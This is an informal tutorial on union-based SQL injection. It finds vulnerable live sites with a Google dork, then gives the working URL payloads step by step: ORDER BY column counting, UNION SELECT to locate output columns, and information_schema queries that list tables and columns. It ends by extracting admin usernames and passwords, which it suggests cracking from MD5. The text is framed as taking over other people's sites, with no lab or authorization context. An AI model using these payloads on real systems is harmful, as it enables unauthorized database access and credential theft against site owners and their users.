The hack starts as follows.
Finding vulnerable site
To find a vunerable site open google
Type in a dork like "inurl:index.php?id=" (without quotes) there are many other similar formats for finding such vulnerable pages.
Now click on any site like http://www.yoursite.com/index.php?id=786
Now to test if the siote is hackable or not add a ' at the end of the site.
If the site gives an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1"
we can assume that it is vunerable. If not try some other site.
We have the vulnerable site now. So lets try with different sql injection queries.
Checking the number of columns:
To check the number of columns we do the following
http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed below
http://www.site.com/index.php?id=-786 order by 2-- (no error)
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- =>error
if we get an error at the 6 like "unknown column" that means there exists only 5 columns.
Finding vunerable columns:
To find the vunerable columns we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786
Now the url becomes
http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--
after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.
Finding Mysql version:
To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.
The URL would become-
http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--
After hitting enter the sql version appears on the page in the vulnerable column space
Lets assume we got 5.0.90-community-log on page which is sql version.
Getting Table names:
To get table names replace @@version in the url with table_name and add from information_schema.tables-- to the end.
The url now becomes
http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--
After hitting enter the page shows the tablenames.
Lets us assume we got something like this
To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.
Getting the column names:
To get the column names from the table "admin" we do the following
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)--
Converting the tablename to ascii:
For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here
The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;
Now remove &# and add a , between them
So now it is 97,100,109,105,110
Replace it in the place of ascii of the tablename
Now it becomes
http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--
You can now see something like
username pwd gender email on page
Getting username and password:
To get the username and password we use
http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.
At this point we see username and password on page.
The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-
This was a nice SQL injection hack tutorial. Please comment if you like the post.